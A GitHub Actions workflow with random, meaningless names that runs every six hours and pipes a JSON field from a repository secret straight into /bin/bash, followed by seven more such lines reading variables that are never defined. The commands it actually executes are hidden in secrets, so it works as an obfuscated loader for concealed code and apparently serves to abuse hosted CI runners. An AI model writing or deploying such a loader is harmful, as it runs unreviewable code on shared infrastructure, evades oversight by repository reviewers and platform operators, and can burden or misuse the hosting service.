name: huangganshi9316

on:
  workflow_dispatch:
  schedule:
    - cron: '3 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangganshi9316
        env:
          tam037: ${{ secrets.tam037 }}
        run: |
          echo $tam037 | jq -r .qj78 | /bin/bash
          echo $btagq54573 | jq -r .ui05 | /bin/bash
          echo $c6 | jq -r .vlrgr1967 | /bin/bash
          echo $ila1595 | jq -r .bjqqz8 | /bin/bash
          echo $v524 | jq -r .sjhpx60 | /bin/bash
          echo $kvur587 | jq -r .t975 | /bin/bash
          echo $lajco673 | jq -r .h2565 | /bin/bash
          echo $bonpb1 | jq -r .xf5116 | /bin/bash

